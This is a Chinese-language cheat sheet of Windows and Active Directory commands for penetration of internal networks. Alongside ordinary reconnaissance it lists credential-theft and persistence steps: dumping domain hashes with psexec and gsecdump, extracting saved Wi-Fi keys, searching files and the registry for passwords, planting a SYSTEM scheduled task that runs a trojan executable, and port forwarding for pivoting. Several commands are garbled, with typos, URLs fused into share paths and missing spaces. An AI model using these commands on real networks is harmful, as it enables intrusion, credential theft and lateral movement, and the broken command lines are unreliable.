一、域常用操作命令
- 用户组相关
net group /domain
:获得所有域用户组列表net group qq_group /domain
:显示域中qq_group
组的成员等操作(包括添加、删除成员及组本身)net group "domain admins"
、net group "enterprise admins"
等:分别获得域管理员、企业管理员等列表
- 用户相关
net user /domain
:获得所有域用户列表及指定账户详细信息net user someuser /domain
:获得指定账户详细信息net user /domain bk bk123
:修改域内用户密码(需管理员权限)
- 其他信息获取
net accounts /domain
:获得域密码策略设置nei view /domain
、net view /domain:testdomain
:查询域及域中计算机列表nltest /domain_trusts
:获取域信任信息net config Workstation
:查询机器属于哪个域net time /domian
:查询主域服务器的时间echo %logonserver%
:查看登陆到这台服务器的计算机名net time \192.168.1.1
:查询远程共享主机时间net use \IP\ipc$ password /user:username@domain
:ipc$ 域内连接net view \http://dc2.backlion.com
:查看域控共享情况dir \http://dc2.backlion.com\SYSVOL /s /a > sysvol.txt
:列出 sysvol 日志记录xcopy \http://dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c
:远程拷贝到本地 sysvol 日志mstsc /admin
:远程桌面登录到 console 会话解决 hash 无法抓出问题gpupdate/force
:更新域策略psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u
:从域服务器密码存储文件导出 hash 值gsecdump -a
:获取域登管理员登录过得 hash 值
二、基本内网渗透命令
- 网络配置相关
ipconfig/all
、ipconfig /release
、ipconfig /renew
:查看、释放、重新获取 IP 地址ping hostname
:显示机器名的 IPnetstat -ano
、netstat -an | find “3389”
:查看开放端口及查找特定端口net accounts
:查看本地密码策略nbtstat –A ip
:netbiso 查询net view
:查看机器注释或活动状态机器列表(netbios 未禁用时)echo %PROCESSOR_ARCHITECTURE%
:查看系统是 32 还是 64 位set
:查看系统环境设置变量
- 用户及权限相关
whoami
、whoami/all
:查询账号所属权限及查看 sid 值net user
、net localhroup administrators
:查看本地组用户及本机管理员组用户net session
:查看当前会话
- 系统信息相关
systeminfo
:查询系统以及补丁信息tasklist /svc
、taskkill /im
、taskkill /pid
:查看进程、结束进程wmic qfe get hotfixid
、wmic qfe list full /format:htable > hotfixes.htm
、wmic qfe
:查看已安装补丁相关信息
- 共享及服务相关
net share
、wmic share get name,path
:查看 SMB 指向的路径(共享)wmic nteventlog get path,filename,writeable
:查询系统日志文件存储位置net use \IP\ipc$ password /user:username
:建立 IPC 会话(工作组模式)net use z: \192.168.1.1
:建立映射到本机 Z 盘at \172.16.16.2 13:50 c:\windows\2009.exe
:在共享主机上执行net start
:查看当前运行的服务wmic service list brief
、wmic process list brief
、wmic startup list brief
、wmic product list brief
:查看进程服务、进程、启动程序、安装程序和版本信息wmic startup list full
:识别开机启动的程序wmic process where(description="mysqld.exe") >>mysql.log
:获取软件安装路径for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan showprofiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %jkey=clear
:一键获取 wifi 密码if defined PSModulePath (echo 支持powershell) else (echo 不支持powershell)
:查看是否支持 posershellqwinsta
:查看登录情况schtasks.exe /Create /RU"SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "c:/muma.ex e" /ED 2017/4/7
:添加计划任务REG query HKCU /v "pwd" /s
:获取保存到注册表中的密码
三、内网网络结常用命令
- 网络路径相关
tracert IP
:路由跟踪route print
:打印路由表arp -a
:列出本网段内所有活跃的IP地址arp -s
、arp -d
:绑定、解绑mac与ip地址nbtscan -r 192.168.16.0/24
:扫描整个网络
- 防火墙相关
netsh firewall show config
、netsh firewall show state
:查看防火墙策略
- 主机扫描相关
for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i"ttl"
:批量扫描内网存活主机
四、windows自带端口转发
- 配置相关
netsh interface ipv6 install
:安装IPV6(部分系统必须)netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=22connectaddress=1.1.1.1 connectport=22
:设置端口转发netsh interface portproxy show all
:查看转发配置netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0listenport=22
:删除配置netsh firewall set portopening protocol=tcp port=22 name=Forwardmode=enable scope=all profile=all
:添加防火墙规则允许连接
五、敏感数据和目录
- 文件查找相关
dir /b/s config.*
:查看所在目录所有config.为前缀的文件findstr /si password.xml.ini *.txt
、findstr /si login.xml.ini *.txt
:查看后缀名文件中含有password、login关键字的文件
六、copy con创建命令
- 创建批处理和脚本
copy con ftp.bat
:创建ftp.bat批处理copy con test.vbs
:创建test.vbs脚本
七、dsquery的AD查询工具
- 用户及相关信息查询
dsquery user domainroot -limit 65535 && net user /domain
:列出域内所有用户名dsquery server -domain http://super.com | dsget server -dnsname -site
:搜索域内所有域控制器并显示DNS主机名和站点名称dsquery contact
:寻找目录中的联系人dsquery subnet
:列出域内网段划分query user
:查询那些用户在线dsquery group && net group /domain
:列出域内分组dsquery ou
:列出域内组织单位dsquery server && net time /domain
:列出域内域控制器dsquery site -o rdn
:搜索域中所有站点的名称dsquery group dc=super,dc=com |more
:搜索在DC=SUPER,DC=COM 域中的所有组psloggedon.exe
:查询那台主机和用户登录到该主机上netsess.exe
:远程主机上无需管理员权限,查询到主机名和用户reg query "HKEY_CURRENT_USER\SOENSION_CLIENT\DEFAULT"
:获取最近mstsc登录的记录
八、DOS常用快捷命令
- 工具调用相关
mspaint
、calc
、notepad
、taskmgr
、osk
、gpedit.msc
、services.msc
、compmgmt.msc
、devmgmt.msc
、winver
、magnify
、eventvwr
、Regedit
、resmon
、WMIC BIOS get releasedate
、mstsc -f
:分别调用画图工具、计算器、记事本、任务管理器、屏幕键盘、组策略、本地服务、计算机管理、设备管理器、系统版本查看、放大镜、事件查看器、注册表、资源监视器、查看电脑生产日期、远程连接(全屏)